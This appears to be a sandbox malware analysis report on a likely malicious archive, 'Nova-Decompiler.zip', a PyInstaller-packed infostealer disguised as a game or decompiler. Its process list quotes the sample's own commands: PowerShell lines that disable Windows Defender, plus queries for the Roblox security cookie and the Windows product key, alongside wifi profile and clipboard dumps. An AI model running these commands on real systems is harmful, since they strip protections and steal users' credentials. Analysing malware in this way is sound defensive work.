Analysis Overview
SHA256
c4ec24bfa071df98b46f849eb12d65e07878bd897f37b1d1e10c183f1549f243
Threat Level: Likely malicious
The file Nova-Decompiler.zip was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Detects Pyinstaller
Unsigned PE
Gathers system information
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Enumerates processes with tasklist
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Detects videocard installed
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Analysis: static1
Detonation Overview
Reported
2024-05-10 15:15
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 15:15
Reported
2024-05-10 15:27
Platform
win11-20240426-en
Max time kernel
274s
Max time network
276s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133598282923041318" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe"
C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffe1e60ab58,0x7ffe1e60ab68,0x7ffe1e60ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2204 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4300 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4100 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4592 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4484 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4984 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff7a1c1ae48,0x7ff7a1c1ae58,0x7ff7a1c1ae68
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5024 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4488 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3056 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3444 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe"
C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[πͺBACKROOMS] Pet Simulator 99!.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command blob omitted]"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hzn1p5b2\hzn1p5b2.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA50B.tmp" "c:\Users\Admin\AppData\Local\Temp\hzn1p5b2\CSC179E2FCDC158456F98BE1DF126C91C81.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1840"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1840
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4448"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4448
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2784"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2784
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2884"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2884
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2532"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2532
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 996"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 996
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1140"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1140
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3752"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3752
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3344"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3344
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3612"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3612
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ββββββΒ ββ β\System\Clipboard.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ββββββΒ ββ β\System\Task List.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ββββββΒ ββ β\System\System Info.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ββββββΒ ββ β\Credentials\Chrome\Chrome Cookies.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ββββββΒ ββ β\Credentials\Chrome\Chrome History.txt
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI46322\python312.dll
C:\Users\Admin\AppData\Local\Temp\_MEI46322\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\base_library.zip
| MD5 | 8dad91add129dca41dd17a332a64d593 |
| SHA1 | 70a4ec5a17ed63caf2407bd76dc116aca7765c0d |
| SHA256 | 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783 |
| SHA512 | 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50 |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\python3.DLL
| MD5 | 79b02450d6ca4852165036c8d4eaed1f |
| SHA1 | ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4 |
| SHA256 | d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123 |
| SHA512 | 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416 |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_ctypes.pyd
| MD5 | bbd5533fc875a4a075097a7c6aba865e |
| SHA1 | ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00 |
| SHA256 | be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570 |
| SHA512 | 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_wmi.pyd
| MD5 | 7ec3fc12c75268972078b1c50c133e9b |
| SHA1 | 73f9cf237fe773178a997ad8ec6cd3ac0757c71e |
| SHA256 | 1a105311a5ed88a31472b141b4b6daa388a1cd359fe705d9a7a4aba793c5749f |
| SHA512 | 441f18e8ce07498bc65575e1ae86c1636e1ceb126af937e2547710131376be7b4cb0792403409a81b5c6d897b239f26ec9f36388069e324249778a052746795e |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_ssl.pyd
| MD5 | 5b9b3f978d07e5a9d701f832463fc29d |
| SHA1 | 0fcd7342772ad0797c9cb891bf17e6a10c2b155b |
| SHA256 | d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa |
| SHA512 | e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405 |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_socket.pyd
| MD5 | dc06f8d5508be059eae9e29d5ba7e9ec |
| SHA1 | d666c88979075d3b0c6fd3be7c595e83e0cb4e82 |
| SHA256 | 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a |
| SHA512 | 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3 |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_overlapped.pyd
| MD5 | ba368245d104b1e016d45e96a54dd9ce |
| SHA1 | b79ef0eb9557a0c7fa78b11997de0bb057ab0c52 |
| SHA256 | 67e6ca6f1645c6928ade6718db28aff1c49a192e8811732b5e99364991102615 |
| SHA512 | 429d7a1f829be98c28e3dca5991edcadff17e91f050d50b608a52ef39f6f1c6b36ab71bfa8e3884167371a4e40348a8cda1a9492b125fb19d1a97c0ccb8f2c7b |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_queue.pyd
| MD5 | 6e0cb85dc94e351474d7625f63e49b22 |
| SHA1 | 66737402f76862eb2278e822b94e0d12dcb063c5 |
| SHA256 | 3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b |
| SHA512 | 1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a |
C:\Users\Admin\AppData\Local\Temp\_MEI46322\_multiprocessing.pyd
| MD5 | a4281e383ef82c482c8bda50504be04a |
| SHA1 | 4945a2998f9c9f8ce1c078395ffbedb29c715d5d |
| SHA256 | 467b0fef42d70b55abf41d817dff7631faeef84dce64f8aadb5690a22808d40c |
